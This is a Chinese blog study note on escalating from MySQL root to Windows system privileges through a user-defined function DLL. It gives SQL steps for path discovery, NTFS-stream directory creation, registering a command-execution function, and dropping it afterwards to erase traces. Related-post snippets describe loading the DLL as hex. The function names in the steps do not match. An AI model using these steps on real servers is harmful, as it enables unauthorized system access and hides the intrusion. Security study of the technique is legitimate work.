Day2——提权学习之MySQL数据库(UDF提权)

最新推荐文章于 2023-04-05 13:42:31 发布
最新推荐文章于 2023-04-05 13:42:31 发布
阅读量225 收藏
点赞数
分类专栏: # 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/syy0201/article/details/103529735
版权

0x00 原理

UDF(user-defined function)是MySQL的一个拓展接口,也可称之为用户自定义函数,它是用来拓展MySQL的技术手段,可以说是数据库功能的一种扩展。
通过在udf文件中定义新函数,对MYSQL的功能进行扩充,可以执行系统任意命令,将MYSQL账号root转化为系统system权限。

0x01 利用条件

  1. mysql版本大于5.1,udf.dll文件必须放置在mysql安装目录的lib\plugin文件夹下

  2. mysql版本小于5.1, udf.dll文件在windows server 2003下放置于c:\windows\system32目录,在windows server 2000下放置在c:\winnt\system32目录。

  3. 掌握mysql数据库的账户,从拥有对mysql的insertdelete权限,以创建和抛弃函数。拥有可以将udf.dll写入相应目录的权限。

  4. 可以将udf.dll写入到相应目录的权限。

0x02 提权关键

导出UDF文件到指定路径

0x03 提权步骤

1、获取数据库版本、数据位置以及插件位置等信息

select version();//获取数据库版本 
select user();//获取数据库用户 
select @@basedir ;//获取安装目录 
show variables like '%plugins%'; //寻找mysql安装路径

2、导出UDF文件
关于UDF文件:
sqlmap中有现成的udf文件,分为32位和64位,一定要选择对版本
关于路径:

MySQL<5.0,导出路径随意;
5.0 <= MySQL<5.1,则需要导出至目标服务器的系统目录(如:c:/windows/system32/)
MySQL 5.1以上版本,必须要把udf.dll文件放到MySQL安装目录下的lib\plugin文件夹下才能创建自定义函数。

用NTFS ADS流模式突破进而创建文件夹

select @@basedir;  //查找到mysql的目录
select 'It is dll' into dumpfile 'C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib::$INDEX_ALLOCATION';    //利用NTFS ADS创建lib目录
select 'It is dll' into dumpfile 'C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib\\plugin::$INDEX_ALLOCATION';    //利用NTFS ADS创建plugin目录

3、创建cmdshell 函数

create function cmdshell returns string soname ‘lib_mysqludf_sys.dll’;

4、执行自定义函数

select sys_eval(‘whoami’);

5、清除痕迹

drop function cmdshell

0x04 参考

https://www.cnblogs.com/R4v3n/articles/8722657.html
《网络攻防实战研究——漏洞利用与提权》

0nc3
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
mysql udf提权文件
02-01
mysql udf提权文件mysql udf提权文件
MySQL提权——udf提权
hackzkaq的博客
04-11 6322
零基础学黑客,搜索公众号:白帽子左一 作者:掌控安全学员——逍遥子 一、前期准备 1.Mysql udf简介 MySQL udf(user definedfunction,用户定义函数),为用户提供了一种高效创建函数的方式。udf函数按其运行模式可以分为单次调用型和聚集函数型两类,单次调用型函数能够针对数据库查询的每一行记录进行处理,聚集函数型用于处理Group By等聚集查询。 2.udf提权原理 udf的设计初衷是为了方便用户自定义一些函数,方便查询一些复杂的数据,同时也增加了使用udf提权的可能
MysqlUDF提权
热门推荐
yy
11-07 1万+
udf提权通过在mysql中添加自定义函数来执行系统命令。效果是从 mysql权限 —> 系统权限。提权限制条件挺多,如下先获取mysql的权限(连接上了mysql数据库Mysql版本大于5.1,我们需手动创建plugin文件夹,这是个棘手的问题mysql有写入文件的权限,即secure_file_priv的值为空。
SQL Server用户定义的函数(UDF)使用详解
Lion_Long的博客
04-05 1942
模块化编程。可以创建一次函数,将其存储在数据库中,并在程序中调用它任意次数。可以独立于程序源代码修改用户定义的函数。执行速度更快。与存储过程类似,Transact-SQL 用户定义函数通过缓存计划并重用它们进行重复执行来降低 Transact-SQL 代码的编译成本。这意味着用户定义的函数不需要在每次使用时重新解析和重新优化,从而缩短执行时间。与 Transact-SQL 函数相比,CLR 函数在计算任务、字符串操作和业务逻辑方面具有显著的性能优势。事务处理 SQL 函数更适合数据访问密集型逻辑。
数据库中的UDT和UDF
weixin_40978341的博客
09-23 1337
一、UDT和UDF的概念 什么是UDT? 在数据库中虽然定义了各种基本的数据类型,但大量的应用往往需要更多特殊的数据类型,因此用户自定义数据类型(User Defined Type,UDT)显得尤为重要。UDT可以使用户不受系统提供的数据类型的限制,而不断增加自己需要的各种数据类型。 什么是UDF? 首先数据库中SQL函数可以大致分为以下几类:内部函数、系统生成的函数、用户定义的函数(UDF),其中用户定义的函数是指由用户通过CREATE FUNCTION显示创建并命名的函数 ,其语义也由用户自己确定。用户
MySQL数据库UDF提权学习
Goodric的博客
07-21 1136
数据库提权的前提条件: 服务器开启数据库服务及获取到最高权限用户密码。 除Access数据库外,其他数据库基本都存在数据库提权的可能。
mysql.zip_ROOT_mysql提权_udf_udf mysql_提权
09-19
提权用的 udf 得到root帐号可以用这个提权
mysql数据库提权所需lib_mysqludf_sys_64.dll(64位)
10-03
提权必备,之后会出对应的提权教程
Linux利用UDF库实现Mysql提权
09-10
根据MySQL函数族的可扩展机制,意味着用户可以自己建立包含有自定义函数的动态库来创建自定义函数,简称udf
udf提权_udf提权_udf.dll下载提权_mysql提权_ballsv6_提权_源码
10-04
mysql提权udf提权所需要的dll文件,有64位和32位
Mysql中使用UDF提权
baidu_38844729的博客
11-23 1210
提权步骤 1.查看secure_file_priv的值 show global variables like 'secure%'; 当secure_file_priv的值为 NULL或/tmp/时,此时无法提权 当secure_file_priv的值没有具体值时,则可以提权 2.查看系统架构以及某些目录 show variables like '%compile%'; 查看主机版本及架构 show variables like 'plugin%'; 查看pl
mysql 5.5 udf提权_提权基础-----mysql-udf提权
weixin_39844267的博客
01-19 170
1.总结关于udf提权方法通过弱口令,爆破,网站配置文件等方式得到mysql数据库帐号密码,---还要能外连(1).将udf.dll代码的16进制数声明给my_udf_a变量set @my_udf_a=concat('',dll的16进制);(2).建表my_udf_data,字段为data,类型为longblob。create table my_udf_data(data LONGBLOB);(...
mysql udf提权
weixin_60719780的博客
03-16 1024
udf提权只要是因为udf.dll文件,攻击者通过编写调用cmd或者shell的udf.dkk文件,并且导入到一个指定的文件夹目录下,创建一个指向udf.dll的自定义函数,从而在数据库中的查询就等价于在cmd或者shell中执行命令。查询下的MySQL版本,这里我的是5.7.26,是大于5.1版本的,也就是说,我们需要找到lib\plugin这个目录,然后将我们的udf.dll文件写进去,其实这里的目录需要我们自己创建。前面做的是为了做铺垫,后面我们提权需要使用这个16进制的udf.dll文件;
MySQL UDF提权
Myu_wzy的博客
11-24 684
一、UDF 介绍 UDFMysql 的一个拓展接口,UDF(Userdefined function) 可翻译为用户自定义函数,是用来拓展 Mysql 的技术手段。 二、UDF提权步骤 1. 查看存放 udf.dll 的指定目录 使用 sql 语句查看 plugin 目录 select @@plugin_dir; show variables like 'plugin%'; 该目录默认是不存在的,需要我们在 Mysql 的安装路径下创建 lib\plugin...
数据库提权MySQL UDF提权 (Window环境)
做自己喜欢的事,并将其发挥到极致!
03-16 1739
本文章仅记录某次内网渗透过程中遇到的MySQL 采用UDF提权等方式进行获取权限,文章中内容仅用于技术交流,切勿用于非授权下渗透攻击行为,慎重!!!UDF(Userdefined function)可以翻译为用户自定义函数,其为mysql的一个拓展接口,可以为Mysql增添一些函数,对MySQL的功能进行扩充,然后就可以在MySQL中进行使用这些函数了。
MySQL提权UDF
不曾扬帆,何以至远方
07-01 1268
MySQL UDFf提权
udf提权
Lum1n0us's Blog
01-19 1580
这里以ctfshow终极考核的web654为例子。 先查看/etc目录下有无敏感文件,发现sudoers.bak,打开后可以看到mysql属于特权用户
数据库udf提权,WAF绕过
qq_42045349的博客
10-02 1012
数据库udf提权,WAF绕过 1、数据库自带函数的功能与用法 数据库功能函数 udf提权 系统函数 函数名 说明 version() 系统版本 user() ||CURRENT_USER() 数据库用户名 database() 数据库名 @@datadir 数据库路径 @@version_compile_os 操作系统版本 select version() as 系统函数,user() as 数据库用户名,database() as 数据库 名 ,@@datadir
Mysql数据库UDF的安全问题利用
weixin_33895016的博客
10-06 270
最近一直在休假,没有写博客,转眼十一还剩最后一天,时间真的很快。今天想谈谈数据库的安全问题。 对于数据库的安全问题,首先,重要的生成库千万不能放在公网上,一旦被******后果不堪设想,轻则数据丢失,重则被***(整库被打包导出),如果恰恰又以明文存储了用户的密码,那么就太可怕了,去年轰动一时的某几个大型网站的用户数据泄漏事件都是因为明文的方式存储了用户的密码。其次是大量的数据库弱口令问题存在...
mysqludf提权
最新发布
10-15
但是,如果攻击者能够创建自己的UDF并将其加载到MySQL中,则可以利用UDF提权攻击,从而获得系统管理员权限。 攻击者可以通过以下步骤进行UDF提权攻击: 1. 创建一个恶意的UDF库文件,其中包含提权代码。 2. 将恶意...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值